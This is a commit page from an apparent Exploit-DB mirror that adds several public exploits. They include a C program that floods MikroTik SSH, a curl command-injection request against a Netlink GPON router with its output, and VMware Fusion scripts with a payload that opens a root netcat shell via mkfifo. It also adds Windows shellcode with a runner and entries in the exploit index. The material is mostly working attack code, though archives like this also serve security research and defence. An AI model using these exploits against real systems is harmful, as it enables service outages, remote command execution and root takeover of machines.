bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2020-03-19

Browse source 
7 changes to exploits/shellcodes

NetBackup 7.0 - 'NetBackup INET Daemon' Unquoted Service Path
Microsoft VSCode Python Extension - Code Execution
VMWare Fusion - Local Privilege Escalation

Microtik SSH Daemon 6.44.3 - Denial of Service (PoC)

Netlink GPON Router 1.0.11 - Remote Code Execution

Windows\x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)
This commit is contained in:
Offensive Security 2020-03-19 05:01:49 +00:00
parent 20e5ee2e94
commit 85cdf30cea
9 changed files with 560 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

103
exploits/hardware/remote/48228.txt Normal file
View file

@ -0,0 +1,103 @@
# Excploit Title: Microtik SSH Daemon 6.44.3 - Denial of Service (PoC)
# Author: Hosein Askari
# Date: 2020-03-18
# Vendor Homepage: https://mikrotik.com/
# Model: hAP lite
# Processor architecture: smips
# Affected Version: through 6.44.3
# CVE: N/A
#Description:
An uncontrolled resource consumption vulnerability in SSH daemon on MikroTik routers through v6.44.3 could allow remote attackers to generate CPU activity, trigger refusal of new authorized connections with SIGPIPE signal(SIGPIPE is the "broken pipe" signal, which is sent to a process when it attempts to write to a pipe whose read end has closed or when it attempts to write to a socket that is no longer open for reading. The default action is to terminate the process) and cause a reboot via connect and write system calls because of uncontrolled resource management.
#details:
The issue reported in 02/25/2020 to the Mikrotik
First response by Mikrotik in 02/26/2020
The additional information about exploit and PoC video sent in 02/26/2020
The vulnerability is accepted by "Reinis-Jānis S" from mikrotik security team in 02/27/2020 and asked for providing the CVE number and disclosure date
#PoC:
#Mitigation:
It can be mitigated with firewall filter and service port restrictions.
Solution:
Hardening and tuning the daemon for these 2 parameters:
1- Number of allowed unauthenticated connections to ssh daemon
2- Maximum number of connections at which we start dropping everything for ssh daemon
PoC:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <signal.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define MAX_CON 32
#define MAX_THREADS 16
int Socket(char *ip, char *port) {
struct addrinfo hints, *ret, *p;
int sock, r;
ssize_t bytes;
char buffer[2048];
memset(&hints, 0, sizeof(hints));
hints.ai_family = AF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
if((r=getaddrinfo(ip, port, &hints, &ret))!=0) {
return EXIT_FAILURE;
}
for(p = ret; p != NULL; p = p->ai_next) {
if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
continue;
}
if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) {
close(sock);
continue;
}
break;
}
if(ret)
freeaddrinfo(ret);
fprintf(stderr, "ESTABLISHED %s:%s\n", ip, port);
return sock;
}
void signal_callback_handler(int signum){
printf("Caught signal SIGPIPE %d\n",signum);
}
void mal(char *ip, char *port, int id) {
int sockets[MAX_CON];
int i, g=1, r;
for(i=0; i!= MAX_CON; i++)
sockets[i]=0;
signal(SIGPIPE, signal_callback_handler);
while(1) {
for(i=0; i!= MAX_CON; i++) {
if(sockets[i] == 0)
sockets[i] = Socket(ip, port);
r=write(sockets[i], "\0", 1);
if(r == -1) {
close(sockets[i]);
sockets[i] = Socket(ip, port);
}
}
usleep(200000);
}
}
int main(int argc, char **argv) {
int i;
for(i=0; i!= MAX_THREADS; i++) {
if(fork())
mal(argv[1], argv[2], i);
usleep(200000);
}
getc(stdin);
return 0;
}
#########
Sincerely,
Hosein Askari

66
exploits/hardware/webapps/48225.txt Normal file
View file

@ -0,0 +1,66 @@
# Exploit Title: Netlink GPON Router 1.0.11 - Remote Code Execution
# Date: 2020-03-17
# Exploit Author: shellord
# Vendor Homepage: https://www.netlink-india.com/
# Version: 1.0.11
# Tested on: Windows 10
# CVE: N/A
Exploit :
curl -L -d "target_addr=;ls /&waninf=1_INTERNET_R_VID_154"
http://TARGETIP/boaform/admin/formPing
Response :
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!--ϵͳĬģ-->
<html>
<head>
<title>PINGԽ</title>
<meta http-equiv=pragma content=no-cache>
<meta http-equiv=refresh content="2">
<meta http-equiv=cache-control content="no-cache, must-revalidate">
<meta http-equiv=content-type content="text/html; charset=gbk">
<meta http-equiv=content-script-type content=text/javascript>
<!--ϵͳcss-->
<style type=text/css>
@import url(/style/default.css);
</style>
<!--ϵͳű-->
<script language="javascript" src="common.js"></script>
</head>
<!-------------------------------------------------------------------------------------->
<!--ҳ-->
<body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0"
alink="#000000" link="#000000" vlink="#000000">
<blockquote>
<form>
<div align="left" style="padding-left:20px;"><br>
<div align="left"><b>Finish</b>
<br><br>
</div>
<pre>
bin
dev
etc
home
image
lib
mnt
proc
sbin
sys
tmp
usr
var
</pre>
<input type=button value="back"
onClick=window.location.replace("/diag_ping_admin_en.asp")>
</div>
</form>
</blockquote>
</body>
</html>

2
exploits/linux/webapps/48212.txt
View file

@ -6,7 +6,7 @@
# Software Link: http://centos-webpanel.com/
# Version: v6 - v7
# Tested on: Kali Linux - Windows 10
# CVE : N/A
# CVE : CVE-2020-10230
# Type: Error Based SQL Injection
# Payload:

148
exploits/macos/local/48232.md Normal file
View file

@ -0,0 +1,148 @@
Local Privilege Escalation via VMWare Fusion
Overview:
A directory traversal vulnerability in VMware Fusion's SUID binaries can allow
an attacker to run commands as the root user.
Tested Versions:
* VMware Fusion 10.1.3 (9472307) on macOS 10.13.6
* VMware Fusion 11.0.0 (10120384) on macOS 10.14.1
* VMware Fusion 11.0.2 (10952296) on macOS 10.14.1
* VMware Fusion 11.5.0 (14634996) on macOS 10.15.1
* VMware Fusion 11.5.1 (15018442) on macOS 10.15.1
Exercising:
1) Ensure the VMware Fusion services are not running. If open, quit the VMware
Fusion GUI.
2) Run one of the exploit script (exploit_fusion.sh or exploit_usb.sh). They
will remain running until manually stopped via CTRL-c. The exploit will start
a netcat listener as root on TCP port 3333.
3) Connect to the netcat listener: nc 127.0.0.1 3333
Details:
This vulnerability is a directory traversal bug inside of VMware Fusion. Several
of the programs included in VMware Fusion rely on the their path on disk to find
other libraries, helper utilities, and service daemons. Two such instances of
this code pattern in SUID programs can be found in the "Open VMware Fusion
Services" executable and the "Open VMware USB Arbitrator Service" executable.
These programs try to open the service programs by looking for the files:
Open VMware Fusion Services:
$DIRECTORY_WITH_SUID_EXECUTABLE/../../../Contents/Library/services/VMware Fusion Services
Open VMware USB Arbitrator Service:
$DIRECTORY_WITH_SUID_EXECUTABLE/../../../Contents/Library/services/VMware USB Arbitrator Service
While ordinarily this is fine, as any attempt to copy the programs will not copy
the SUID ownership of the file and any attempt to the move the programs will
fail without root access. Furthermore symbolic links will not trick the programs
into using the new location. However, on macOS unprivileged users can create
hard links to SUID executables, which will trick the programs. Thus, by creating
an adequate directory layout and hard linking to the SUID programs, we can trick
them into running an executable of our choice as the root user. The included
exploit_usb.sh and exploit_fusion.sh scripts setup the correct directory
structure and hard link, compile the payload, and run the linked program in
order to start a netcat listener as root on TCP port 3333.
In addition to the two SUID executables listed above, the SUID executable
"vmware-authd" is also vulnerable to this bug. vmware-authd tries to load two
libraries, libcrypto and libssl, from the incorrect directory. However, the two
libraries must be signed by apple or with an apple distributed signing
certificate from an organization containing the word "VMware". As such, this bug
is harder to exploit in vmware-authd. Depending on how strict Apple's developer
verification process is, it may be possible to fool Apple into granting a
matching certificate by hiding VMware within a phrase, such as with a
certificate for "Never Mind Where cloud services inc (NVMware Inc)".
One limitation to this vulnerability is that these two vulnerable service
openers will not try to open their services if the service is already running.
Thus, the exploit will not work if the "VMware USB Arbitrator Service" and
"VMware Fusion Services" services are already running. Thus, if the VMware
Fusion GUI is open, this vulnerability cannot be exploited. However, closing the
GUI will stop the services associated with the vulnerable service openers and
make the vulnerability once again exploitable. In contrast, the library
injection attack is not subject to these restrictions (but requires the
appropriate certificate).
As a side note, the vulnerable code is also used in VMware Workstation on Linux.
However, Linux does not allow an unprivileged user to create hard links to files
they do not own. As such, this bug is not exploitable in VMware Workstation on
Linux.
Timeline:
2019.11.12 Reported to VMware
2019.12.18 VMware confirms they can reproduce the issue
2019.12.24 Asked for status update, were told we'd get an update in early Jan
2020.01.08 Requested status update, were told fix scheduled for April 2020
2020.01.15 Called VMware to discuss
2020.01.21 Follow up meeting with VMware to discuss
2020.03.17 VMware releases patch & public disclosure
## exploit_fusion.sh
```
#!/bin/sh
# Remake the necessary folder structure
rm -rf a Contents
mkdir -p Contents/Library/services/
mkdir -p a/b/c/
# Build our payload
clang payload.c -o "Contents/Library/services/VMware Fusion Services"
# Create a hard link to the VMware SUID opener program
ln /Applications/VMware\ Fusion.app/Contents/Library/services/Open\ VMware\ Fusion\ Services a/b/c/linked
# Run the linked program, which causes it to be confused about the path, and
# launch our payload. Additionally if our payload exits, VMware will relaunch
# it
a/b/c/linked
```
## exploit_fusion.sh EOF
## exploit_usb.sh
```
#!/bin/sh
# Remake the necessary folder structure
rm -rf a Contents
mkdir -p Contents/Library/services/
mkdir -p a/b/c/
# Build our payload
clang payload.c -o "Contents/Library/services/VMware USB Arbitrator Service"
# Create a hard link to the VMware SUID opener program
ln /Applications/VMware\ Fusion.app/Contents/Library/services/Open\ VMware\ USB\ Arbitrator\ Service a/b/c/linked
# Run the linked program, which causes it to be confused about the path, and
# launch our payload. Additionally if our payload exits, VMware will relaunch
# it
a/b/c/linked
```
## exploit_usb.sh EOF
## payload.c
```
#include <stdlib.h>
#include <unistd.h>
int main(int argc, char**argv) {
setuid(0);
system("rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -l 3333 > /tmp/f");
return 0;
}
```
## payload.c EOF

16
exploits/multiple/local/48231.md Normal file
View file

@ -0,0 +1,16 @@
# VSCode Python Extension Code Execution
This repository contains the Proof-of-Concept of a code execution vulnerability discovered in the [Visual Studio Code](https://code.visualstudio.com/) Python extension.
>TL;DR: VScode may use code from a virtualenv found in the project folders without asking the user, for things such as formatting, autocompletion, etc. This insecure design leads to arbitrary code execution by simply cloning and opening a malicious Python repository.
You can read more about this vulnerability on our blog: [https://blog.doyensec.com/2020/03/16/vscode_codeexec.html](https://blog.doyensec.com/2020/03/16/vscode_codeexec.html).
## HowTo
- Clone the 'malicious' repository with `git clone https://github.com/doyensec/VSCode_PoC_Oct2019.git`
- Add the cloned repo to a VSCode workspace on macOS. Note that the vulnerability affects all platforms, but the PoC is executing *Calculator.app*
- Open `test.py` in VScode
Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48231.zip

35
exploits/windows/local/48227.txt Normal file
View file

@ -0,0 +1,35 @@
# Exploit Title: NetBackup 7.0 - 'NetBackup INET Daemon' Unquoted Service Path
# Discovery by: Alan Mondragon "El Masas"
# Discovery Date: 2020-03-17
# Vendor Homepage: https://www.veritas.com/
# Software Link : https://www.veritas.com/
# Veritas
# Tested Version: 7.0
# Vulnerability Type: Unquoted t Service Path
# Tested on OS: Windows Server 2008 R2 en
# Step to discover Unquoted Service Path:
C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ Auto
NetBackup Client Service NetBackup INET Daemon
C:\Program Files\Veritas\NetBackup\bin\bpinetd.exe
Auto
C:\>sc qc "NetBackup INET Daemon"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: NetBackup INET Daemon
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Veritas\NetBackup\bin\bpinetd.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : NetBackup Client Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#Exploit:
# A successful attempt would require the local user to be able to insert their code in the system root path
# undetected by the OS or other security applications where it could potentially be executed during
# application startup or reboot. If successful, the local user's code would execute with the elevated
# privileges of the application.

5
files_exploits.csv
View file

@ -10991,6 +10991,9 @@ id,file,description,date,author,type,platform,port
48193,exploits/windows/local/48193.txt,"ASUS AXSP 1.02.00 - 'asComSvc' Unquoted Service Path",2020-03-11,"Roberto Piña",local,windows,
48206,exploits/windows/local/48206.txt,"ASUS AAHM 1.00.22 - 'asHmComSvc' Unquoted Service Path",2020-03-12,"Roberto Piña",local,windows,
48211,exploits/windows/local/48211.py,"AnyBurn 4.8 - Buffer Overflow (SEH)",2020-03-13,"Richard Davy",local,windows,
48227,exploits/windows/local/48227.txt,"NetBackup 7.0 - 'NetBackup INET Daemon' Unquoted Service Path",2020-03-18,"El Masas",local,windows,
48231,exploits/multiple/local/48231.md,"Microsoft VSCode Python Extension - Code Execution",2020-03-17,Doyensec,local,multiple,
48232,exploits/macos/local/48232.md,"VMWare Fusion - Local Privilege Escalation",2020-03-17,Grimm,local,macos,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -18046,6 +18049,7 @@ id,file,description,date,author,type,platform,port
48214,exploits/hardware/remote/48214.py,"Drobo 5N2 4.1.1 - Remote Command Injection",2020-03-13,"Ian Sindermann",remote,hardware,
48223,exploits/linux/remote/48223.rb,"Rconfig 3.x - Chained Remote Code Execution (Metasploit)",2020-03-17,Metasploit,remote,linux,
48224,exploits/multiple/remote/48224.rb,"ManageEngine Desktop Central - Java Deserialization (Metasploit)",2020-03-17,Metasploit,remote,multiple,
48228,exploits/hardware/remote/48228.txt,"Microtik SSH Daemon 6.44.3 - Denial of Service (PoC)",2020-03-18,FarazPajohan,remote,hardware,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -42478,3 +42482,4 @@ id,file,description,date,author,type,platform,port
48219,exploits/php/webapps/48219.py,"PHPKB Multi-Language 9 - Authenticated Remote Code Execution",2020-03-16,"Antonio Cannito",webapps,php,
48220,exploits/php/webapps/48220.py,"PHPKB Multi-Language 9 - Authenticated Directory Traversal",2020-03-16,"Antonio Cannito",webapps,php,
48221,exploits/php/webapps/48221.py,"PHPKB Multi-Language 9 - 'image-upload.php' Authenticated Remote Code Execution",2020-03-16,"Antonio Cannito",webapps,php,
48225,exploits/hardware/webapps/48225.txt,"Netlink GPON Router 1.0.11 - Remote Code Execution",2020-03-18,shellord,webapps,hardware,

Can't render this file because it is too large.

1
files_shellcodes.csv
View file

@ -1016,3 +1016,4 @@ id,file,description,date,author,type,platform
47980,shellcodes/windows/47980.txt,"Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes)",2020-01-30,boku,shellcode,windows
48032,shellcodes/linux/48032.py,"Linux/x86 - Bind Shell Generator Shellcode (114 bytes)",2020-02-10,boku,shellcode,linux
48116,shellcodes/windows_x86/48116.c,"Windows\x86 - Null-Free WinExec Calc.exe Shellcode (195 bytes)",2020-02-24,boku,shellcode,windows_x86
48229,shellcodes/windows/48229.txt,"Windows\x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)",2020-03-18,boku,shellcode,windows

1 id file description date author type platform
1016 47980 shellcodes/windows/47980.txt Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes) 2020-01-30 boku shellcode windows
1017 48032 shellcodes/linux/48032.py Linux/x86 - Bind Shell Generator Shellcode (114 bytes) 2020-02-10 boku shellcode linux
1018 48116 shellcodes/windows_x86/48116.c Windows\x86 - Null-Free WinExec Calc.exe Shellcode (195 bytes) 2020-02-24 boku shellcode windows_x86
1019 48229 shellcodes/windows/48229.txt Windows\x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes) 2020-03-18 boku shellcode windows

185
shellcodes/windows/48229.txt Normal file
View file

@ -0,0 +1,185 @@
# Shellcode Title: Windows\x64 Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)
# Shellcode Author: Bobby Cooke
# Date: March 2020-03-17
# Tested On:
# Windows 10 Pro 1909 (x86): HelpPane.exe, notepad.exe, certutil.exe
# Windows 10 Pro 1909 (x86_64): mmc.exe, xwizard.exe
# [!] Will only work if MessageBoxA or MessageBoxW exist in the Import Table of the Host PE
; Create new StackFrame
push ebp
mov ebp, esp
sub esp, 0x10
; Dynamically find the base address of the executable image from the PEB
; FS_Register > TEB > PEB > &ImageBase
xor ecx, ecx
mul ecx ; Clears EAX, ECX, EDX Registers
mov ebx, eax ; clear EBX Register
mov ebx, [fs:ebx+0x30] ; get PEB address = TEB+0x30
mov ebx, [ebx+0x8] ; get Image Base Addr = PEB+0x8
push ebx ; save &ImageBase in EBX
pop eax ; copy &ImageBase to EAX
; Get the Address of the Import Table
; DOS_Header > PE_Signature > ImportTable
add eax, [ebx+0x3C] ; EAX = &PE_Signature
mov dl, 0x80 ; &PE_Signature+0x80 = &ImportTable_RVA
add ax, dx ; EAX = &ImportTable_RVA
mov edx, [eax] ; EDX = RVA ImportTable
add edx, ebx ; EDX = &ImportTable
add dl, 0xC ; EDX = &Name_RVA of first Imported DLL
; Create string 'USER32'
mov cx, 0x3233 ; 23 : 3233
push ecx ; push "23, 0x0000"
push 0x52455355 ; RESU : 52455355
mov [ebp-0x4], esp
; Find the Name RVA for user32.dll within the Import Table
; ImportTable > ImportDirectoryTable > LoopNameRVA's
xor ecx, ecx ; ECX = Counter
fUser32Name:
push edx ; EDX = &Name_RVA of first Imported DLL
xor eax, eax
mov al, 0x14 ; &Name_RVA's are every 20 bytes
mul cl ; Counter * 20 bytes
add [esp], eax
pop eax ; EAX = &Name_RVA of Nth DLL
push eax
mov esi, [ebp-0x4] ; ESI = &String
mov edi, [eax] ; EDI = RVA Name of Nth DLL
add edi, ebx ; EDI = &Name of Nth DLL
push ecx ; save counter to stack
xor ecx, ecx
cld ; clear direction flag = Process strings from left to right
mov cl, 0x6 ; ECX = String Length
repe cmpsb ; compare first 6 bytes of &
pop ecx ; ECX = Counter
jz foundUser32Name ; If string at &Name_RVA == "USER32", then end loop
pop eax ; Pickup String Addr to fix stack
inc ecx ; else Counter ++
jmp short fUser32Name ; restart the loop
foundUser32Name:
pop eax ; EAX = &Name_RVA of user32.dll
mov [ebp-0x8], eax ; [ESP-0x8] = &Name_RVA of user32.dll
sub al, 0xC ; EAX = &User32_ImportNameTable_RVA
mov eax, [eax] ; EAX = User32_ImportNameTable_RVA
add eax, ebx ; EAX = &User32_ImportNameTable
mov [ebp-0xC], eax ; [ESP-0xC] = &User32_ImportNameTable
; Create string 'MessageBoxA'
mov ecx, 0x41786f6f ; Axoo : 41786f6f
shr ecx, 8
push ecx ; "oxA,0x00"
push 0x42656761 ; Bega : 42656761
push 0x7373654d ; sseM : 7373654d
jmp Counter
MessageBoxW:
mov byte [esp+0xA], 0x57 ; Change A to W
mov eax, [ebp-0xC] ; EAX = &User32_ImportNameTable
; Find the Name RVA for MessageBoxA within the Import Table
; ImportTable > ImportDirectoryTable > LoopNameRVA's
Counter:
xor ecx, ecx
fNameLoop:
mov esi, esp ; ESI = "MessageBoxA,0x00"
xor edx, edx
mov edi, [eax] ; EDI = RVA NameString
cmp edi, edx ; See if we checked all imported function names
je MessageBoxW
add edi, ebx ; EDI = &NameString of Nth Function
inc edi ; skip the first 2 bytes - Ordinal Value
inc edi ; skip the first 2 bytes
push ecx ; push counter value
xor ecx, ecx
cld ; clear direction flag = Process strings from left to right
mov cl, 0xB ; ECX = String Length
repe cmpsb ; compare first 11 bytes
pop ecx ; ECX = Counter value
jz foundName ; If string at &NameString == "MessageBox-", then end loop
mov dl, 0x4
add eax, edx ; Next RVA NameString of Imported User32.dll function
inc ecx ; Counter ++
jmp short fNameLoop ; restart the loop
foundName:
mov eax, [ebp-0x8] ; EAX = &User32_Name_RVA
add al, 0x4 ; EAX = &User32_ImportAddressTable_RVA
mov edi, [eax] ; EDI = User32_ImportAddressTable_RVA
add edi, ebx ; EDI = &User32_ImportNameTable
xor eax, eax
mov al, 0x4
mul cx ; Counter * 4 = Offset MessageBoxA in Table
add eax, edi ;[EAX] = &MessageBoxA
mov eax, [eax] ; EAX = &MessageBoxA
mov byte bl, [esp+0xA] ; DL = 'A' or 'W'
;CALL to MessageBoxA
; hOwner = NULL
; Text = "BOKU"
; Title = "BOKU"
; Style = MB_OK|MB_APPLMODAL
xor ecx, ecx ; clear ecx register
push ecx ; string terminator 0x00 for string "BOKU"
; MessageBoxA or MessageBoxW?
cmp bl, 0x41 ; if BL = 'A', then
je MsgBoxA ; push ASCII string
; String = "B-O-K-U-"
push 0x2d552d4b ; -U-K : 2d552d4b
push 0x2d4f2d42 ; -O-B : 2d4f2d42
mov edx, esp ; EDX = &String
UnicodeStrLoop:
inc edx ; 1st Char +1
mov byte [edx], ch ; Null byte after ever char in Unicode String
inc edx ; Every Other Char +2
inc ecx ; LoopCounter ++
cmp cl, 0x4 ; If end of string, then
je pushArgs ; Push arguments to stack for MessageBox- Call
jmp short UnicodeStrLoop
MsgBoxA:
push 0x554b4f42 ; UKOB : 554b4f42
pushArgs:
xor ecx, ecx
mov ebx, esp ; EBX = &String
push ecx
push ebx
push ebx
push ecx
call eax ; Call MessageBox- Function
############################################################################################################################
#include <windows.h>
#include <stdio.h>
char code[] = \
"\x55\x89\xe5\x83\xec\x10\x31\xc9\xf7\xe1\x89\xc3\x64\x8b\x5b\x30\x8b\x5b"
"\x08\x53\x58\x03\x43\x3c\xb2\x80\x66\x01\xd0\x8b\x10\x01\xda\x80\xc2\x0c"
"\x66\xb9\x33\x32\x51\x68\x55\x53\x45\x52\x89\x65\xfc\x31\xc9\x52\x31\xc0"
"\xb0\x14\xf6\xe1\x01\x04\x24\x58\x50\x8b\x75\xfc\x8b\x38\x01\xdf\x51\x31"
"\xc9\xfc\xb1\x06\xf3\xa6\x59\x74\x04\x58\x41\xeb\xde\x58\x89\x45\xf8\x2c"
"\x0c\x8b\x00\x01\xd8\x89\x45\xf4\xb9\x6f\x6f\x78\x41\xc1\xe9\x08\x51\x68"
"\x61\x67\x65\x42\x68\x4d\x65\x73\x73\xeb\x08\xc6\x44\x24\x0a\x57\x8b\x45"
"\xf4\x31\xc9\x89\xe6\x31\xd2\x8b\x38\x39\xd7\x74\xec\x01\xdf\x47\x47\x51"
"\x31\xc9\xfc\xb1\x0b\xf3\xa6\x59\x74\x07\xb2\x04\x01\xd0\x41\xeb\xe0\x8b"
"\x45\xf8\x04\x04\x8b\x38\x01\xdf\x31\xc0\xb0\x04\x66\xf7\xe1\x01\xf8\x8b"
"\x00\x8a\x5c\x24\x0a\x31\xc9\x51\x80\xfb\x41\x74\x18\x68\x4b\x2d\x55\x2d"
"\x68\x42\x2d\x4f\x2d\x89\xe2\x42\x88\x2a\x42\x41\x80\xf9\x04\x74\x07\xeb"
"\xf4\x68\x42\x4f\x4b\x55\x31\xc9\x89\xe3\x51\x53\x53\x51\xff\xd0";
int main(int argc, char **argv)
{
int (*func)();
func = (int(*)()) code;
(int)(*func)();
}